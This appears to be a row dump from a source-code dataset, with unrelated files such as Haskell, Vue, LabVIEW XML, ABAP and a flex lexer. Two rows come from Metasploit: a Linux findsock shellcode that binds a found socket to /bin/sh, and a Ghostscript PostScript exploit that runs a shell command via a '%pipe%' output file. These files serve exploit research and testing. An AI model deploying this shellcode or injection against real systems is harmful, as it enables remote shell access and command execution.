content stringlengths 4 1.04M | lang stringclasses 358
values | score int64 0 5 | repo_name stringlengths 5 114 | repo_path stringlengths 4 229 | repo_licenses listlengths 1 8 |
|---|---|---|---|---|---|
size: 1024px 512px;
dpi: 96;
limit-y: 0 20000000;
limit-x: 1404278100 1404299700;
axes {
position: bottom left;
label-format-y: scientific();
label-format-x: datetime("%H:%M:%S");
}
grid {
color: #fff;
}
areas {
data-x: csv("test/testdata/measurement.csv" time);
data-y: csv("test/testdata/measurement.csv" value1);
color: #888;
}
| CLIPS | 3 | asmuth-archive/travistest | test/examples/charts_basic_areachart.clp | [
"Apache-2.0"
] |
module Hasura.Backends.Postgres.DDL.Table
( fetchAndValidateEnumValues,
)
where
import Control.Monad.Trans.Control (MonadBaseControl)
import Control.Monad.Validate
import Data.HashMap.Strict qualified as Map
import Data.List (delete)
import Data.List.NonEmpty qualified as NE
import Data.Sequence qualified as Seq
import Data.Sequence.NonEmpty qualified as NESeq
import Data.Text.Extended
import Database.PG.Query qualified as Q
import Hasura.Backends.Postgres.Connection
import Hasura.Backends.Postgres.SQL.DML
import Hasura.Backends.Postgres.SQL.Types
import Hasura.Base.Error
import Hasura.Prelude
import Hasura.RQL.Types.Backend
import Hasura.RQL.Types.Column
import Hasura.RQL.Types.Table
import Hasura.SQL.Backend
import Hasura.SQL.Types
import Hasura.Server.Utils
import Language.GraphQL.Draft.Syntax qualified as G
data EnumTableIntegrityError (b :: BackendType)
= EnumTablePostgresError !Text
| EnumTableMissingPrimaryKey
| EnumTableMultiColumnPrimaryKey ![PGCol]
| EnumTableNonTextualPrimaryKey !(RawColumnInfo b)
| EnumTableNoEnumValues
| EnumTableInvalidEnumValueNames !(NE.NonEmpty Text)
| EnumTableNonTextualCommentColumn !(RawColumnInfo b)
| EnumTableTooManyColumns ![PGCol]
fetchAndValidateEnumValues ::
forall pgKind m.
(Backend ('Postgres pgKind), MonadIO m, MonadBaseControl IO m) =>
PGSourceConfig ->
QualifiedTable ->
Maybe (PrimaryKey ('Postgres pgKind) (RawColumnInfo ('Postgres pgKind))) ->
[RawColumnInfo ('Postgres pgKind)] ->
m (Either QErr EnumValues)
fetchAndValidateEnumValues pgSourceConfig tableName maybePrimaryKey columnInfos =
runExceptT $
either (throw400 ConstraintViolation . showErrors) pure =<< runValidateT fetchAndValidate
where
fetchAndValidate ::
(MonadIO n, MonadBaseControl IO n, MonadValidate [EnumTableIntegrityError ('Postgres pgKind)] n) =>
n EnumValues
fetchAndValidate = do
maybePrimaryKeyColumn <- tolerate validatePrimaryKey
maybeCommentColumn <- validateColumns maybePrimaryKeyColumn
case maybePrimaryKeyColumn of
Nothing -> refute mempty
Just primaryKeyColumn -> do
result <-
runPgSourceReadTx pgSourceConfig $
runValidateT $
fetchEnumValuesFromDb tableName primaryKeyColumn maybeCommentColumn
case result of
Left e -> (refute . pure . EnumTablePostgresError . qeError) e
Right (Left vErrs) -> refute vErrs
Right (Right r) -> pure r
where
validatePrimaryKey = case maybePrimaryKey of
Nothing -> refute [EnumTableMissingPrimaryKey]
Just primaryKey -> case _pkColumns primaryKey of
column NESeq.:<|| Seq.Empty -> case prciType column of
PGText -> pure column
_ -> refute [EnumTableNonTextualPrimaryKey column]
columns -> refute [EnumTableMultiColumnPrimaryKey $ map prciName (toList columns)]
validateColumns primaryKeyColumn = do
let nonPrimaryKeyColumns = maybe columnInfos (`delete` columnInfos) primaryKeyColumn
case nonPrimaryKeyColumns of
[] -> pure Nothing
[column] -> case prciType column of
PGText -> pure $ Just column
_ -> dispute [EnumTableNonTextualCommentColumn column] $> Nothing
columns -> dispute [EnumTableTooManyColumns $ map prciName columns] $> Nothing
showErrors :: [EnumTableIntegrityError ('Postgres pgKind)] -> Text
showErrors allErrors =
"the table " <> tableName <<> " cannot be used as an enum " <> reasonsMessage
where
reasonsMessage = makeReasonMessage allErrors showOne
showOne :: EnumTableIntegrityError ('Postgres pgKind) -> Text
showOne = \case
EnumTablePostgresError err -> "postgres error: " <> err
EnumTableMissingPrimaryKey -> "the table must have a primary key"
EnumTableMultiColumnPrimaryKey cols ->
"the table’s primary key must not span multiple columns ("
<> commaSeparated (sort cols)
<> ")"
EnumTableNonTextualPrimaryKey colInfo -> typeMismatch "primary key" colInfo PGText
EnumTableNoEnumValues -> "the table must have at least one row"
EnumTableInvalidEnumValueNames values ->
let pluralString = " are not valid GraphQL enum value names"
valuesString = case NE.reverse (NE.sort values) of
value NE.:| [] -> "value " <> value <<> " is not a valid GraphQL enum value name"
value2 NE.:| [value1] -> "values " <> value1 <<> " and " <> value2 <<> pluralString
lastValue NE.:| otherValues ->
"values " <> commaSeparated (reverse otherValues) <> ", and "
<> lastValue <<> pluralString
in "the " <> valuesString
EnumTableNonTextualCommentColumn colInfo -> typeMismatch "comment column" colInfo PGText
EnumTableTooManyColumns cols ->
"the table must have exactly one primary key and optionally one comment column, not "
<> tshow (length cols)
<> " columns ("
<> commaSeparated (sort cols)
<> ")"
where
typeMismatch description colInfo expected =
"the table’s " <> description <> " (" <> prciName colInfo <<> ") must have type "
<> expected <<> ", not type " <>> prciType colInfo
fetchEnumValuesFromDb ::
forall pgKind m.
(MonadTx m, MonadValidate [EnumTableIntegrityError ('Postgres pgKind)] m) =>
QualifiedTable ->
RawColumnInfo ('Postgres pgKind) ->
Maybe (RawColumnInfo ('Postgres pgKind)) ->
m EnumValues
fetchEnumValuesFromDb tableName primaryKeyColumn maybeCommentColumn = do
let nullExtr = Extractor SENull Nothing
commentExtr = maybe nullExtr (mkExtr . prciName) maybeCommentColumn
query =
Q.fromBuilder $
toSQL
mkSelect
{ selFrom = Just $ mkSimpleFromExp tableName,
selExtr = [mkExtr (prciName primaryKeyColumn), commentExtr]
}
rawEnumValues <- liftTx $ Q.withQE defaultTxErrorHandler query () True
when (null rawEnumValues) $ dispute [EnumTableNoEnumValues]
let enumValues = flip map rawEnumValues $
\(enumValueText, comment) ->
case mkValidEnumValueName enumValueText of
Nothing -> Left enumValueText
Just enumValue -> Right (EnumValue enumValue, EnumValueInfo comment)
badNames = lefts enumValues
validEnums = rights enumValues
case NE.nonEmpty badNames of
Just someBadNames -> refute [EnumTableInvalidEnumValueNames someBadNames]
Nothing -> pure $ Map.fromList validEnums
where
-- https://graphql.github.io/graphql-spec/June2018/#EnumValue
mkValidEnumValueName name =
if name `elem` ["true", "false", "null"]
then Nothing
else G.mkName name
| Haskell | 5 | devrsi0n/graphql-engine | server/src-lib/Hasura/Backends/Postgres/DDL/Table.hs | [
"Apache-2.0",
"MIT"
] |
;;
;
; Name: single_findsock
; Platforms: Linux
; Authors: vlad902 <vlad902 [at] gmail.com>
; Authors: skape <mmiller [at] hick.org>
; Version: $Revision: 1856 $
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; Description:
;
; Search file descriptors based on source port.
;
;;
BITS 32
global main
main:
xor edx, edx
push edx
mov ebp, esp
push byte 0x07
pop ebx
push byte 0x10
push esp
push ebp
push edx
mov ecx, esp
getpeername_loop:
inc dword [ecx]
push byte 0x66
pop eax
int 0x80
cmp word [ebp + 2], 0x5c11
jne getpeername_loop
pop ebx
push byte 0x02
pop ecx
dup2_loop:
mov al, 0x3f
int 0x80
dec ecx
jns dup2_loop
push edx
push dword 0x68732f2f
push dword 0x6e69622f
mov ebx, esp
push edx
push ebx
mov ecx, esp
mov al, 0x0b
int 0x80
| Assembly | 3 | OsmanDere/metasploit-framework | external/source/shellcode/linux/ia32/single_findsock.asm | [
"BSD-2-Clause",
"BSD-3-Clause"
] |
<template>
<div class="text-center">
<v-btn
color="error"
@click="overlay = !overlay"
>
Show Overlay
</v-btn>
<v-overlay :value="overlay"></v-overlay>
</div>
</template>
<script>
export default {
data: () => ({
overlay: false,
}),
watch: {
overlay (val) {
val && setTimeout(() => {
this.overlay = false
}, 2000)
},
},
}
</script>
| Vue | 4 | mark-gene/vuetify | packages/docs/src/examples/v-overlay/usage.vue | [
"MIT"
] |
<?xml version='1.0' encoding='UTF-8'?>
<Project Type="Project" LVVersion="19008000">
<Property Name="NI.LV.All.SourceOnly" Type="Bool">true</Property>
<Item Name="My Computer" Type="My Computer">
<Property Name="server.app.propertiesEnabled" Type="Bool">true</Property>
<Property Name="server.control.propertiesEnabled" Type="Bool">true</Property>
<Property Name="server.tcp.enabled" Type="Bool">false</Property>
<Property Name="server.tcp.port" Type="Int">0</Property>
<Property Name="server.tcp.serviceName" Type="Str">My Computer/VI Server</Property>
<Property Name="server.tcp.serviceName.default" Type="Str">My Computer/VI Server</Property>
<Property Name="server.vi.callsEnabled" Type="Bool">true</Property>
<Property Name="server.vi.propertiesEnabled" Type="Bool">true</Property>
<Property Name="specify.custom.address" Type="Bool">false</Property>
<Item Name="SampleLib.lvlib" Type="Library" URL="../../SampleLib.lvlib"/>
<Item Name="Dependencies" Type="Dependencies">
<Item Name="vi.lib" Type="Folder">
<Item Name="NI_XML.lvlib" Type="Library" URL="/<vilib>/xml/NI_XML.lvlib"/>
</Item>
<Item Name="DOMUserDefRef.dll" Type="Document" URL="DOMUserDefRef.dll">
<Property Name="NI.PreserveRelativePath" Type="Bool">true</Property>
</Item>
<Item Name="ExternalDep.lvlib" Type="Library" URL="../../ExternalDep/ExternalDep.lvlib"/>
<Item Name="ExternalLib.lvlib" Type="Library" URL="../../ExternalLib.lvlib"/>
<Item Name="SampleDependentLib.lvlib" Type="Library" URL="../../SampleDependentLib.lvlib"/>
</Item>
<Item Name="Build Specifications" Type="Build">
<Item Name="NIPackage" Type="{E661DAE2-7517-431F-AC41-30807A3BDA38}">
<Property Name="NIPKG_addToFeed" Type="Bool">false</Property>
<Property Name="NIPKG_certificates" Type="Bool">true</Property>
<Property Name="NIPKG_createInstaller" Type="Bool">false</Property>
<Property Name="NIPKG_feedLocation" Type="Path">../builds/NI_AB_PROJECTNAME/NIPackage/Feed</Property>
<Property Name="NIPKG_feedLocation.Type" Type="Str">relativeToCommon</Property>
<Property Name="NIPKG_installerArtifacts" Type="Str"></Property>
<Property Name="NIPKG_installerBuiltBefore" Type="Bool">false</Property>
<Property Name="NIPKG_installerDestination" Type="Path">../builds/NI_AB_PROJECTNAME/NIPackage/Package Installer</Property>
<Property Name="NIPKG_installerDestination.Type" Type="Str">relativeToCommon</Property>
<Property Name="NIPKG_lastBuiltPackage" Type="Str"></Property>
<Property Name="NIPKG_license" Type="Ref"></Property>
<Property Name="NIPKG_releaseNotes" Type="Str"></Property>
<Property Name="NIPKG_storeProduct" Type="Bool">false</Property>
<Property Name="NIPKG_VisibleForRuntimeDeployment" Type="Bool">false</Property>
<Property Name="PKG_actions.Count" Type="Int">0</Property>
<Property Name="PKG_autoIncrementBuild" Type="Bool">false</Property>
<Property Name="PKG_autoSelectDeps" Type="Bool">true</Property>
<Property Name="PKG_buildNumber" Type="Int">0</Property>
<Property Name="PKG_buildSpecName" Type="Str">NIPackage</Property>
<Property Name="PKG_dependencies.Count" Type="Int">0</Property>
<Property Name="PKG_description" Type="Str"></Property>
<Property Name="PKG_destinations.Count" Type="Int">1</Property>
<Property Name="PKG_destinations[0].ID" Type="Str">{A8F32011-3422-445D-9FA2-853FB3F9FE59}</Property>
<Property Name="PKG_destinations[0].Subdir.Directory" Type="Str">Package A</Property>
<Property Name="PKG_destinations[0].Subdir.Parent" Type="Str">root_5</Property>
<Property Name="PKG_destinations[0].Type" Type="Str">Subdir</Property>
<Property Name="PKG_displayName" Type="Str">My Package</Property>
<Property Name="PKG_displayVersion" Type="Str"></Property>
<Property Name="PKG_feedDescription" Type="Str"></Property>
<Property Name="PKG_feedName" Type="Str"></Property>
<Property Name="PKG_homepage" Type="Str"></Property>
<Property Name="PKG_hostname" Type="Str"></Property>
<Property Name="PKG_maintainer" Type="Str">National Instruments <></Property>
<Property Name="PKG_output" Type="Path">../NI_AB_PROJECTNAME/NIPackage/Package</Property>
<Property Name="PKG_output.Type" Type="Str">relativeToProject</Property>
<Property Name="PKG_packageName" Type="Str">package-a</Property>
<Property Name="PKG_publishToSystemLink" Type="Bool">false</Property>
<Property Name="PKG_section" Type="Str">Application Software</Property>
<Property Name="PKG_shortcuts.Count" Type="Int">0</Property>
<Property Name="PKG_sources.Count" Type="Int">1</Property>
<Property Name="PKG_sources[0].Destination" Type="Str">{A8F32011-3422-445D-9FA2-853FB3F9FE59}</Property>
<Property Name="PKG_sources[0].ID" Type="Ref">/My Computer/Build Specifications/Package A (relative to project)</Property>
<Property Name="PKG_sources[0].Type" Type="Str">Build</Property>
<Property Name="PKG_synopsis" Type="Str">Package A</Property>
<Property Name="PKG_version" Type="Str">1.0.0</Property>
</Item>
<Item Name="Package A (abs path)" Type="Packed Library">
<Property Name="Bld_buildCacheID" Type="Str">{CB4AF3BB-AEEB-47B4-922E-5612514F7052}</Property>
<Property Name="Bld_buildSpecName" Type="Str">Package A (abs path)</Property>
<Property Name="Bld_localDestDir" Type="Path">/C/builds/NI_AB_PROJECTNAME/Package A (abs path)</Property>
<Property Name="Bld_previewCacheID" Type="Str">{20FD1763-D555-4300-B69E-8029285A2079}</Property>
<Property Name="Bld_version.major" Type="Int">1</Property>
<Property Name="Destination[0].destName" Type="Str">Package A.lvlibp</Property>
<Property Name="Destination[0].path" Type="Path">/C/builds/NI_AB_PROJECTNAME/Package A (abs path)/Package A.lvlibp</Property>
<Property Name="Destination[0].path.type" Type="Str"><none></Property>
<Property Name="Destination[0].preserveHierarchy" Type="Bool">true</Property>
<Property Name="Destination[0].type" Type="Str">App</Property>
<Property Name="Destination[1].destName" Type="Str">Support Directory</Property>
<Property Name="Destination[1].path" Type="Path">/C/builds/NI_AB_PROJECTNAME/Package A (abs path)</Property>
<Property Name="Destination[1].path.type" Type="Str"><none></Property>
<Property Name="DestinationCount" Type="Int">2</Property>
<Property Name="PackedLib_callersAdapt" Type="Bool">true</Property>
<Property Name="Source[0].itemID" Type="Str">{C5DF01E3-881F-4E58-8242-0CF4BD815813}</Property>
<Property Name="Source[0].type" Type="Str">Container</Property>
<Property Name="Source[1].destinationIndex" Type="Int">0</Property>
<Property Name="Source[1].itemID" Type="Ref">/My Computer/SampleLib.lvlib</Property>
<Property Name="Source[1].Library.allowMissingMembers" Type="Bool">true</Property>
<Property Name="Source[1].Library.atomicCopy" Type="Bool">true</Property>
<Property Name="Source[1].Library.LVLIBPtopLevel" Type="Bool">true</Property>
<Property Name="Source[1].preventRename" Type="Bool">true</Property>
<Property Name="Source[1].sourceInclusion" Type="Str">TopLevel</Property>
<Property Name="Source[1].type" Type="Str">Library</Property>
<Property Name="SourceCount" Type="Int">2</Property>
<Property Name="TgtF_companyName" Type="Str">National Instruments</Property>
<Property Name="TgtF_fileDescription" Type="Str">Package A (abs path)</Property>
<Property Name="TgtF_internalName" Type="Str">Package A (abs path)</Property>
<Property Name="TgtF_legalCopyright" Type="Str">Copyright © 2021 National Instruments</Property>
<Property Name="TgtF_productName" Type="Str">Package A (abs path)</Property>
<Property Name="TgtF_targetfileGUID" Type="Str">{EC66B4EF-83E5-4CD0-8DD4-895B399457BA}</Property>
<Property Name="TgtF_targetfileName" Type="Str">Package A.lvlibp</Property>
<Property Name="TgtF_versionIndependent" Type="Bool">true</Property>
</Item>
<Item Name="Package A (relative to common)" Type="Packed Library">
<Property Name="Bld_buildCacheID" Type="Str">{B9B227B6-D751-4FF2-91E4-8F64397BEF2C}</Property>
<Property Name="Bld_buildSpecName" Type="Str">Package A (relative to common)</Property>
<Property Name="Bld_localDestDir" Type="Path">../builds/NI_AB_PROJECTNAME</Property>
<Property Name="Bld_localDestDirType" Type="Str">relativeToCommon</Property>
<Property Name="Bld_previewCacheID" Type="Str">{C50E0191-77A0-46F4-934F-043435F18AC8}</Property>
<Property Name="Bld_version.major" Type="Int">1</Property>
<Property Name="Destination[0].destName" Type="Str">Package A.lvlibp</Property>
<Property Name="Destination[0].path" Type="Path">../builds/NI_AB_PROJECTNAME/Package A.lvlibp</Property>
<Property Name="Destination[0].preserveHierarchy" Type="Bool">true</Property>
<Property Name="Destination[0].type" Type="Str">App</Property>
<Property Name="Destination[1].destName" Type="Str">Support Directory</Property>
<Property Name="Destination[1].path" Type="Path">../builds/NI_AB_PROJECTNAME</Property>
<Property Name="DestinationCount" Type="Int">2</Property>
<Property Name="PackedLib_callersAdapt" Type="Bool">true</Property>
<Property Name="Source[0].itemID" Type="Str">{92534D5C-043A-451E-952B-B553D241FA73}</Property>
<Property Name="Source[0].type" Type="Str">Container</Property>
<Property Name="Source[1].destinationIndex" Type="Int">0</Property>
<Property Name="Source[1].itemID" Type="Ref">/My Computer/SampleLib.lvlib</Property>
<Property Name="Source[1].Library.allowMissingMembers" Type="Bool">true</Property>
<Property Name="Source[1].Library.atomicCopy" Type="Bool">true</Property>
<Property Name="Source[1].Library.LVLIBPtopLevel" Type="Bool">true</Property>
<Property Name="Source[1].preventRename" Type="Bool">true</Property>
<Property Name="Source[1].sourceInclusion" Type="Str">TopLevel</Property>
<Property Name="Source[1].type" Type="Str">Library</Property>
<Property Name="SourceCount" Type="Int">2</Property>
<Property Name="TgtF_companyName" Type="Str">National Instruments</Property>
<Property Name="TgtF_fileDescription" Type="Str">Package A (relative to common)</Property>
<Property Name="TgtF_internalName" Type="Str">Package A (relative to common)</Property>
<Property Name="TgtF_legalCopyright" Type="Str">Copyright © 2021 National Instruments</Property>
<Property Name="TgtF_productName" Type="Str">Package A (relative to common)</Property>
<Property Name="TgtF_targetfileGUID" Type="Str">{FC297B77-1673-45FB-AFEE-8151856D0AE6}</Property>
<Property Name="TgtF_targetfileName" Type="Str">Package A.lvlibp</Property>
<Property Name="TgtF_versionIndependent" Type="Bool">true</Property>
</Item>
<Item Name="Package A (relative to project)" Type="Packed Library">
<Property Name="Bld_buildCacheID" Type="Str">{110F7A29-342C-4992-B022-CFC604738D6D}</Property>
<Property Name="Bld_buildSpecName" Type="Str">Package A (relative to project)</Property>
<Property Name="Bld_localDestDir" Type="Path">../Packages</Property>
<Property Name="Bld_localDestDirType" Type="Str">relativeToProject</Property>
<Property Name="Bld_previewCacheID" Type="Str">{E87785C0-BF13-48F7-9A65-35E332B8A0E6}</Property>
<Property Name="Bld_version.major" Type="Int">1</Property>
<Property Name="Destination[0].destName" Type="Str">Package A.lvlibp</Property>
<Property Name="Destination[0].path" Type="Path">../Packages/Package A (relative to project).lvlibp</Property>
<Property Name="Destination[0].path.type" Type="Str">relativeToProject</Property>
<Property Name="Destination[0].preserveHierarchy" Type="Bool">true</Property>
<Property Name="Destination[0].type" Type="Str">App</Property>
<Property Name="Destination[1].destName" Type="Str">Support Directory</Property>
<Property Name="Destination[1].path" Type="Path">../Packages</Property>
<Property Name="Destination[1].path.type" Type="Str">relativeToProject</Property>
<Property Name="DestinationCount" Type="Int">2</Property>
<Property Name="PackedLib_callersAdapt" Type="Bool">true</Property>
<Property Name="Source[0].itemID" Type="Str">{C5DF01E3-881F-4E58-8242-0CF4BD815813}</Property>
<Property Name="Source[0].type" Type="Str">Container</Property>
<Property Name="Source[1].destinationIndex" Type="Int">0</Property>
<Property Name="Source[1].itemID" Type="Ref">/My Computer/SampleLib.lvlib</Property>
<Property Name="Source[1].Library.allowMissingMembers" Type="Bool">true</Property>
<Property Name="Source[1].Library.atomicCopy" Type="Bool">true</Property>
<Property Name="Source[1].Library.LVLIBPtopLevel" Type="Bool">true</Property>
<Property Name="Source[1].preventRename" Type="Bool">true</Property>
<Property Name="Source[1].sourceInclusion" Type="Str">TopLevel</Property>
<Property Name="Source[1].type" Type="Str">Library</Property>
<Property Name="SourceCount" Type="Int">2</Property>
<Property Name="TgtF_companyName" Type="Str">National Instruments</Property>
<Property Name="TgtF_fileDescription" Type="Str">Package A (relative to project)</Property>
<Property Name="TgtF_internalName" Type="Str">Package A (relative to project)</Property>
<Property Name="TgtF_legalCopyright" Type="Str">Copyright © 2021 National Instruments</Property>
<Property Name="TgtF_productName" Type="Str">Package A (relative to project)</Property>
<Property Name="TgtF_targetfileGUID" Type="Str">{06F45259-4BB2-4985-B77B-4AEBB2687676}</Property>
<Property Name="TgtF_targetfileName" Type="Str">Package A.lvlibp</Property>
<Property Name="TgtF_versionIndependent" Type="Bool">true</Property>
</Item>
</Item>
</Item>
</Project>
| LabVIEW | 2 | jovianarts/LVSolutionBuilder | src/_tests/Tests.Assets/HierarchyExample/Package A.lvproj | [
"MIT"
] |
%
% Simple program to print a banner page
%
/banner {
/saveobj save def
erasepage initgraphics
/#copies 1 def
/inch {72 mul} bind def
/pagebbox [clippath pathbbox newpath] def
/font /Helvetica def
/size 20 def
/height pagebbox 3 get def
/width pagebbox 2 get .09 mul def
.92 setgray
pagebbox 0 get pagebbox 1 get moveto
width 0 rlineto 0 height rlineto width neg 0 rlineto closepath eofill
pagebbox 2 get pagebbox 1 get moveto
width neg 0 rlineto 0 height rlineto width 0 rlineto closepath eofill
0 setgray
font findfont size scalefont setfont
/linesp size size .15 mul add neg def
/tab (Destination) stringwidth pop 1.5 mul def
/nextline {0 0 moveto show tab 0 moveto show 0 linesp translate} def
pagebbox 0 get 1.5 width mul add pagebbox 3 get 2.0 width mul sub translate
(Bin) nextline
(Name) nextline
(Owner) nextline
(File) nextline
(Account) nextline
(Destination) nextline
(Spooldate) nextline
showpage
saveobj restore
} bind def
| PostScript | 4 | newluhux/plan9port | src/cmd/postscript/psfiles/banner.ps | [
"MIT"
] |
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="layout" content="main" />
<title>Show TestDomain</title>
</head>
<body>
<div class="nav">
<span class="menuButton"><a class="home" href="${createLinkTo(dir:'')}">Home</a></span>
<span class="menuButton"><g:link class="list" action="list">TestDomain List</g:link></span>
<span class="menuButton"><g:link class="create" action="create">New TestDomain</g:link></span>
</div>
<div class="body">
<h1>Show TestDomain</h1>
<g:if test="${flash.message}">
<div class="message">${flash.message}</div>
</g:if>
<div class="dialog">
<table>
<tbody>
<tr class="prop">
<td valign="top" class="name">Id:</td>
<td valign="top" class="value">${fieldValue(bean:testDomainInstance, field:'id')}</td>
</tr>
<tr class="prop">
<td valign="top" class="name">Age:</td>
<td valign="top" class="value">${fieldValue(bean:testDomainInstance, field:'age')}</td>
</tr>
<tr class="prop">
<td valign="top" class="name">Name:</td>
<td valign="top" class="value">${fieldValue(bean:testDomainInstance, field:'name')}</td>
</tr>
</tbody>
</table>
</div>
<div class="buttons">
<g:form>
<input type="hidden" name="id" value="${testDomainInstance?.id}" />
<span class="button"><g:actionSubmit class="edit" value="Edit" /></span>
<span class="button"><g:actionSubmit class="delete" onclick="return confirm('Are you sure?');" value="Delete" /></span>
</g:form>
</div>
</div>
</body>
</html>
| Groovy Server Pages | 3 | Antholoj/netbeans | contrib/groovy.grailsproject/test/unit/data/projects/completion/grails-app/views/testDomain/show.gsp | [
"Apache-2.0"
] |
***************************************
** Program: EXAMPLE **
** Author: Joe Byte, 07-Jul-2007 **
***************************************
REPORT BOOKINGS.
* Read flight bookings from the database
SELECT * FROM FLIGHTINFO
WHERE CLASS = 'Y' "Y = economy
OR CLASS = 'C'. "C = business
(...)
REPORT TEST.
WRITE 'Hello World'.
USERPROMPT = 'Please double-click on a line in the output list ' &
'to see the complete details of the transaction.'.
DATA LAST_EOM TYPE D. "last end-of-month date
* Start from today's date
LAST_EOM = SY-DATUM.
* Set characters 6 and 7 (0-relative) of the YYYYMMDD string to "01",
* giving the first day of the current month
LAST_EOM+6(2) = '01'.
* Subtract one day
LAST_EOM = LAST_EOM - 1.
WRITE: 'Last day of previous month was', LAST_EOM.
DATA : BEGIN OF I_VBRK OCCURS 0,
VBELN LIKE VBRK-VBELN,
ZUONR LIKE VBRK-ZUONR,
END OF I_VBRK. | ABAP | 3 | soonhokong/ace | demo/kitchen-sink/docs/abap.abap | [
"BSD-3-Clause"
] |
%!PS
userdict /setpagedevice undef
a0
currentpagedevice /HWResolution get 0 (metasploit) put
{ grestore } stopped pop
(ppmraw) selectdevice
mark /OutputFile (%pipe%echo vulnerable > /dev/tty) currentdevice putdeviceprops
{ showpage } stopped pop
quit
| PostScript | 1 | OsmanDere/metasploit-framework | data/exploits/ghostscript/msf.ps | [
"BSD-2-Clause",
"BSD-3-Clause"
] |
%{
// $Id: esmiles.flex 4974 2006-02-18 00:49:21Z glandrum $
//
// Copyright (C) 2002-2006 Rational Discovery LLC
//
// @@ All Rights Reserved @@
//
#pragma warning(disable:4786)
#include <stdio.h>
#undef yywrap
#undef YY_INPUT
#include "InputFiller.h"
extern INPUT_FUNC_TYPE gp_myInput;
#define YY_INPUT( b, r, ms) (r = gp_myInput( b, ms ))
#include <GraphMol/GraphMol.h>
#include <GraphMol/Atom.h>
#include <GraphMol/Bond.h>
#include <GraphMol/PeriodicTable.h>
#ifdef WIN32
#include <io.h>
#endif
#include <string>
#include "smiles.tab.h"
#ifdef WIN32
int
isatty( int fd )
{
return _isatty( fd );
}
#endif
using namespace RDKit;
static PeriodicTable * gl_ptab = PeriodicTable::getTable();
%}
%s IN_ATOM_STATE
%%
@[' ']*TH |
@[' ']*AL |
@[' ']*SQ |
@[' ']*BP |
@[' ']*OH { return CHI_CLASS; }
@+ { return AT; }
<IN_ATOM_STATE>He |
<IN_ATOM_STATE>Li |
<IN_ATOM_STATE>Be |
<IN_ATOM_STATE>Ne |
<IN_ATOM_STATE>Na |
<IN_ATOM_STATE>Mg |
<IN_ATOM_STATE>Al |
<IN_ATOM_STATE>Si |
<IN_ATOM_STATE>Ar |
<IN_ATOM_STATE>K |
<IN_ATOM_STATE>Ca |
<IN_ATOM_STATE>Sc |
<IN_ATOM_STATE>Ti |
<IN_ATOM_STATE>V |
<IN_ATOM_STATE>Cr |
<IN_ATOM_STATE>Mn |
<IN_ATOM_STATE>Co |
<IN_ATOM_STATE>Fe |
<IN_ATOM_STATE>Ni |
<IN_ATOM_STATE>Cu |
<IN_ATOM_STATE>Zn |
<IN_ATOM_STATE>Ga |
<IN_ATOM_STATE>Ge |
<IN_ATOM_STATE>As |
<IN_ATOM_STATE>Se |
<IN_ATOM_STATE>Kr |
<IN_ATOM_STATE>Rb |
<IN_ATOM_STATE>Sr |
<IN_ATOM_STATE>Y |
<IN_ATOM_STATE>Zr |
<IN_ATOM_STATE>Nb |
<IN_ATOM_STATE>Mo |
<IN_ATOM_STATE>Tc |
<IN_ATOM_STATE>Ru |
<IN_ATOM_STATE>Rh |
<IN_ATOM_STATE>Pd |
<IN_ATOM_STATE>Ag |
<IN_ATOM_STATE>Cd |
<IN_ATOM_STATE>In |
<IN_ATOM_STATE>Sn |
<IN_ATOM_STATE>Sb |
<IN_ATOM_STATE>Te |
<IN_ATOM_STATE>Xe |
<IN_ATOM_STATE>Cs |
<IN_ATOM_STATE>Ba |
<IN_ATOM_STATE>La |
<IN_ATOM_STATE>Ce |
<IN_ATOM_STATE>Pr |
<IN_ATOM_STATE>Nd |
<IN_ATOM_STATE>Pm |
<IN_ATOM_STATE>Sm |
<IN_ATOM_STATE>Eu |
<IN_ATOM_STATE>Gd |
<IN_ATOM_STATE>Tb |
<IN_ATOM_STATE>Dy |
<IN_ATOM_STATE>Ho |
<IN_ATOM_STATE>Er |
<IN_ATOM_STATE>Tm |
<IN_ATOM_STATE>Yb |
<IN_ATOM_STATE>Lu |
<IN_ATOM_STATE>Hf |
<IN_ATOM_STATE>Ta |
<IN_ATOM_STATE>W |
<IN_ATOM_STATE>Re |
<IN_ATOM_STATE>Os |
<IN_ATOM_STATE>Ir |
<IN_ATOM_STATE>Pt |
<IN_ATOM_STATE>Au |
<IN_ATOM_STATE>Hg |
<IN_ATOM_STATE>Tl |
<IN_ATOM_STATE>Pb |
<IN_ATOM_STATE>Bi |
<IN_ATOM_STATE>Po |
<IN_ATOM_STATE>At |
<IN_ATOM_STATE>Rn |
<IN_ATOM_STATE>Fr |
<IN_ATOM_STATE>Ra |
<IN_ATOM_STATE>Ac |
<IN_ATOM_STATE>Th |
<IN_ATOM_STATE>Pa |
<IN_ATOM_STATE>U |
<IN_ATOM_STATE>Np |
<IN_ATOM_STATE>Pu |
<IN_ATOM_STATE>Am |
<IN_ATOM_STATE>Cm |
<IN_ATOM_STATE>Bk |
<IN_ATOM_STATE>Cf |
<IN_ATOM_STATE>Es |
<IN_ATOM_STATE>Fm |
<IN_ATOM_STATE>Md |
<IN_ATOM_STATE>No |
<IN_ATOM_STATE>Lr { yylval.atom = new Atom( gl_ptab->getAtomicNumber( yytext ) );
return ATOM;
}
B |
C |
N |
O |
P |
S |
F |
Cl |
Br |
I { yylval.atom = new Atom( gl_ptab->getAtomicNumber( yytext ) );
return ORGANIC_ATOM;
}
H {
return H;
}
c { yylval.atom = new Atom ( 6 );
yylval.atom->setIsAromatic(true);
return AROMATIC_ATOM;
}
n { yylval.atom = new Atom( 7 );
yylval.atom->setIsAromatic(true);
return AROMATIC_ATOM;
}
o { yylval.atom = new Atom( 8 );
yylval.atom->setIsAromatic(true);
return AROMATIC_ATOM;
}
p { yylval.atom = new Atom( 15 );
yylval.atom->setIsAromatic(true);
return AROMATIC_ATOM;
}
s { yylval.atom = new Atom( 16 );
yylval.atom->setIsAromatic(true);
return AROMATIC_ATOM;
}
\- { return MINUS; }
\+ { return PLUS; }
\< { return LT; }
\> { return GT; }
[\=\#\:] { yylval.bond = new Bond();
Bond::BondType bt;
switch(yytext[0]){
case '=':
bt = Bond::DOUBLE;
break;
case '#':
bt = Bond::TRIPLE;
break;
case ':':
bt = Bond::AROMATIC;
break;
}
yylval.bond->setBondType(bt);
return BOND; }
[\\] { yylval.bond = new Bond(Bond::SINGLE);
yylval.bond->setBondDir(Bond::ENDDOWNRIGHT);
return BOND; }
[\/] { yylval.bond = new Bond(Bond::SINGLE);
